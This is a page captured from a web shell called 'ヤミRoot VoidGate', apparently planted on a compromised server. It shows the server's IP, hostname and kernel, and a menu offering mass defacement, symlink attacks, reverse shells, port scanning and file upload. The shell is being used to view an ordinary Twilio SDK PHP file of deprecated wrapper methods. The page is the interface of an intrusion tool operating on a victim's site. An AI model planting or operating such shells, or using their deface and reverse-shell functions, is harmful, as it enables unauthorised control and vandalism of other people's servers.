ヤミRoot VoidGate
User / IP
:
216.73.216.81
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
twilio
/
sdk
/
src
/
Twilio
/
Rest
/
Viewing: Wireless.php
<?php namespace Twilio\Rest; use Twilio\Rest\Wireless\V1; class Wireless extends WirelessBase { /** * @deprecated Use v1->usageRecords instead. */ protected function getUsageRecords(): \Twilio\Rest\Wireless\V1\UsageRecordList { echo "usageRecords is deprecated. Use v1->usageRecords instead."; return $this->v1->usageRecords; } /** * @deprecated Use v1->commands instead. */ protected function getCommands(): \Twilio\Rest\Wireless\V1\CommandList { echo "commands is deprecated. Use v1->commands instead."; return $this->v1->commands; } /** * @deprecated Use v1->commands(\$sid) instead. * @param string $sid The SID that identifies the resource to fetch */ protected function contextCommands(string $sid): \Twilio\Rest\Wireless\V1\CommandContext { echo "commands(\$sid) is deprecated. Use v1->commands(\$sid) instead."; return $this->v1->commands($sid); } /** * @deprecated Use v1->ratePlans instead. */ protected function getRatePlans(): \Twilio\Rest\Wireless\V1\RatePlanList { echo "ratePlans is deprecated. Use v1->ratePlans instead."; return $this->v1->ratePlans; } /** * @deprecated Use v1->ratePlans(\$sid) instead. * @param string $sid The SID that identifies the resource to fetch */ protected function contextRatePlans(string $sid): \Twilio\Rest\Wireless\V1\RatePlanContext { echo "ratePlans(\$sid) is deprecated. Use v1->ratePlans(\$sid) instead."; return $this->v1->ratePlans($sid); } /** * @deprecated Use v1->sims instead. */ protected function getSims(): \Twilio\Rest\Wireless\V1\SimList { echo "sims is deprecated. Use v1->sims instead."; return $this->v1->sims; } /** * @deprecated Use v1->sims(\$sid) instead. * @param string $sid The SID of the Sim resource to fetch */ protected function contextSims(string $sid): \Twilio\Rest\Wireless\V1\SimContext { echo "sims(\$sid) is deprecated. Use v1->sims(\$sid) instead."; return $this->v1->sims($sid); } }
Coded With 💗 by
0x6ick